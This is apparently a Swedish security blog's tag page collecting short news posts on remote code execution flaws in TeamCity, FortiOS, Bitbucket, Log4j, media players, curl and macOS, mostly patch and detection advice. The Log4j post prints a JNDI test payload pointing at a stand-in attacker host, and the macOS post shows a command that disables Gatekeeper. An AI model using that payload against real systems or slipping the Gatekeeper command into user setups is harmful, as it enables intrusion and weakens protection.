Taggat med: rce

Två nya allvarliga sårbarheter i TeamCity

JetBrains Teamcity

Det amerikanska säkerhetsföretaget Rapid7 har identifierat två nya allvarliga sårbarheter i JetBrains TeamCity CI/CD-server.

Sårbarheterna är enligt följande två CVEer:

  • CVE-2024-27198 – Denna sårbarhet gör att det är möjligt att ta sig förbi autentiseringen genom CWE-288 ”Authentication Bypass Using an Alternate Path or Channel”
  • CVE-2024-27199 – Gör också att det är möjligt att ta sig förbi autentisering i webbkomponenten genom CWE-22 ”Improper Limitation of a Pathname to a Restricted Directory/Path Traversal”

Dessa två sårbarheter har CVSS score på 9.8 (Critical) respektive 7.3 (High). Jetbrains som är företaget bakom TeamCity har släppt ett blogginlägg om sårbarheterna samt rekommenderar att organisationer uppdaterar till version 2023.11.4 snarast.

A remote unauthenticated attacker can leverage this to take complete control of a vulnerable TeamCity server.

Källa samt mer information hittas hos Rapid7.

Kritisk sårbarhet i FortiOS

Kritisk sårbarhet i FortiOS

CERT-SE gick ut med en varning gällande en kritisk sårbarhet i FortiOS från Fortinet. Sårbarheten medger kodexekvering över nätverk.

Sårbarheten återfinnes i FortiOS sslvpnd-process och är en heap-baserad sårbarhet. Genom att stänga av VPN i FortiOS så kan man förhindra att sårbarheten kan utnyttjas.

Fortigate har även gått ut och meddelat att denna sårbarhet används aktivt på internet. Användare av FortiGates produkter med VPN påslaget bör titta i loggfilerna efter följande meddelande:

Logdesc="Application crashed" and msg="[...] application:sslvpnd,[...], Signal 11 received, Backtrace: [...]“ 

Även så skrivs följande filer till filsystemet på FortiOS / Fortigate om enheten har blivit hackad:

/data/lib/libips.bak
/data/lib/libgif.so
/data/lib/libiptcp.so
/data/lib/libipudp.so
/data/lib/libjepg.so
/var/.sslvpnconfigbk
/data/etc/wxd.conf
/flash

Följande versioner är sårbara:

  • FortiOS version 7.2.0 till 7.2.2
  • FortiOS version 7.0.0 till 7.0.8
  • FortiOS version 6.4.0 till 6.4.10
  • FortiOS version 6.2.0 till 6.2.11
  • FortiOS version 6.0.0 till 6.0.15
  • FortiOS version 5.6.0 till 5.6.14
  • FortiOS version 5.4.0 till 5.4.13
  • FortiOS version 5.2.0 till 5.2.15
  • FortiOS version 5.0.0 till 5.0.14
  • FortiOS-6K7K version 7.0.0 till 7.0.7
  • FortiOS-6K7K version 6.4.0 till 6.4.9
  • FortiOS-6K7K version 6.2.0 till 6.2.11
  • FortiOS-6K7K version 6.0.0 till 6.0.14

Sårbarheten har CVE-2022-42475 och har kopplingar till ransomware-grupperingar som nyttjar denna sårbarhet för att installera ransomware. Se även information här på Franska.

Ny RCE i Bitbucket server

Atlassian Bitbucket

En 17-årig webbsäkerhetsforskare vid namn Maxwell ”TheGrandPew” Garret har identifierat en RCE-sårbarhet (Remote Code Execution) i mjukvaran Bitbucket Server och Bitbucket Data Center.

Sårbarheten har CVE-2022-36804 och går att utnyttja där en angripare har läsrättigheter till privata repon. Sårbarheten är av typen command injection vulnerability. Har ni en server av typen Bitbucket Mesh så måste även denna uppgraderas.

En workaround har även släppts av Atlassian som går ut på att temporärt stänga va publik access:

feature.public.access=false

Ovan inställning gör att sårbarheten går från att vara icke-autentiserad RCE till autentiserad RCE. Läs mer hos Atlassian på följande länk.

TheGrandPew meddelar även att en PoC kommer att släppas i slutet av september:

Allvarlig sårbarhet i Log4j

Uppdatering: Listan över sårbara applikationer och system bara växer. Nu senast har det visat sig att Ghidra från NSA är sårbart. Sårbarheten har fått det fyndiga namnet Log4Shell

Uppdatering 2: Nu har någon börjat att sammanställa en lista med sårbara system: https://twitter.com/80vul/status/1469250599846027265

Uppdatering 3: Sårbarheten har fått CVE-2021-44228. Uppdateringen log4j-2.15.0-rc1 var bristfällig så därför har log4j-2.15.0-rc2 släppts.

Uppdatering 4: Nu har version 2.16.0 släppts som helt stänger av JDNI som standard.

Log4j är ett populärt bibliotek som används för spårbarhet och loggning, flertalet populära system och produkter använder log4j såsom: Apple iCloud, Steam, Minecraft och Elasticsearch. Sårbarheten kan medge fjärrexekvering av kod (Remote Code Execution, RCE).

En bra payload för att testa är följande:

${jndi:ldap://attacker.com/a}

Ovan payload använder sig av Java Naming and Directory Interface och LDAP för att försöka ansluta till attacker.com. Givetvis kan även Burp Suite Collaborator också användas eller interact.sh för att detektera kommunikation (OOB).

För att åtgärda bristen kan version log4j-2.15.0-rc1 av log4j installeras eller så kan man sätta inställningen log4j2.formatMsgNoLookups till true.

Se även denna tråd på HackerNews.

Flertalet mediaspelare sårbara via undertexter

Cybersäkerhetsforskare vid företaget Check Point har identifierat sårbarheter i en mängd populära mediaspelare. Sårbarheten ligger i hur dessa mediaspelare hanterar filer med undertexter och kan ge en angripare RCE (Remote Code Execution).

Och att just använda undertexter som en attackvektor är intressant eftersom många antivirus-produkter inte söker igenom undertext-filer efter skadlig kod. Samt så har mediaspelaren VLC över 170 miljoner nedladdningar vilket gör den till ett attraktivt mål. Det finns även över 25 olika format för undertexter som dessa olika mediaspelare stödjer.

Följande mediaspelare har sårbarheter och uppdateringar har släppts:

Video som demonstrerar sårbarheten:

Cure53 granskar cURL

curlTyska IT-säkerhetsföretaget Cure53 har nu släppt en rapport gällande granskning av cURL. Granskningen sponsrades av Mozillas Secure Open Source och identifierade 23 säkerhetsrelaterade problem i källkoden.

Koden granskades av fem personer under 20 dagar samt så var fokus på cURL version 7.50.1. Av dessa 23 identifierade problem så var 9 st klassade som sårbarheter och 14 st som generella svagheter.

Fyra sårbarheter kan troligtvis leda till RCE (Remote Code Execution). Men du kan dock vara lugn för samtliga dessa rapporterade brister har åtgärdats den 2:a November och en uppgradering 7.71.0 löser problemen.

För mer information se curls säkerhetssida här:

Eller loggen för åtgärder som finnes på Google Docs.

Samt så kan du ladda hem Cure53:s rapport som PDF i sin helhet här nedan. Som vanligt så är det alltid intressant att läsa andras granskningar och således själv lära och bli en bättre granskare.

Cure53 granskning av cURL

 

 Nya säkerhetshöjande funktioner i macOS Sierra

För några timmar sedan så släppte Apple en ny version av sitt operativsystem. Denna nya version heter macOS Sierra och är en uppföljare till OS X El Capitan.

Sierra innehåller över 60 stycken säkerhetsfixar (som givetvis även finns tillgängliga för El Capitan) och här är ett axplock av dessa:

  • Apple HSSPI Support CVE-2016-4697:
  • AppleEFIRuntime CVE-2016-4696
  • AppleMobileFileIntegrity CVE-2016-4698
  • AppleUUC CVE-2016-4699 och CVE-2016-4700
  • Application Firewall CVE-2016-4701
  • ATS CVE-2016-4779
  • Audio CVE-2016-4702

Den sårbarhet som är allvarligast enligt min bedömning är CVE-2016-4702 som gör att en angripare över nätverket kan exekvera kod (remote code execution).

Även så innehåller Sierra en intressant funktion som eventuellt öppnar upp för framtida säkerhetsbrister är möjligheten att låsa upp sin stationära dator via Apple Watch.

Sierra åtgärdar även ett säkerhetsrelaterat problem som har uppmärksammats genom att Dropbox försöker ”sno” användarens lösenord och således erhålla möjlighet att styra OS X:

dropbox

Men detta behöver inte Dropbox göra längre då användaren nu får en ny dialogruta som frågar efter behörigheter på följande sätt:

dropbox-accessibility-permission

Även så går det inte längre att via Systeminställningarna ställa in så att appar går att köra från alla ställen då ”Anywhere” saknas som ett tredje alternativ här:

sierra

Men detta förfarande i Gatekeeper går givetvis att ändra med lite kommandotolks-magi. Dock inget jag rekommenderar:

sudo spctl --master-disable 

En till säkerhetshöjande åtgärd inom Gatekeeper är nu att osignerade nyinstallerade appar kommer att hamna i en ny katalog med slumpmässigt namn. Detta är för att försvåra för skadlig kod att utnyttja en brist som Patrick Wardle på företaget Synack identifierade 2015. Även så skrotas stödet för PPTP i Sierra och iOS 10.

macOS Sierra är en kostandsfri uppgradering och går hitta i Apple App Store.

Uppdatering: Joachim Strömbergson kommenterar även att Sierra använder flertalet mer molntjänster för olika appar vilket gör att mer information lagras och hanteras i Apples molntjänster.

Uppdatering 2: Det heter givetvis El Capitan och inget annat.

DRM vs. Reverse Engineering

Federico Biancuzzi intervjuar Nate Lawson som varit med och skrivit kopieringsskyddet till Blu-ray. Vi har även tidigare skrivit om DRM-attacker här.

Each time a new digital rights management (DRM) system is released, hackers are not far behind in cracking it. Reverse engineers have taken down the security protecting content encoded for Windows Media, iTunes, DVDs, and HD-DVDs.

Intervjun återfinns på SecurityFocus.com

Vill du vet mer om Reverse Engineering så titta in hos Triop AB.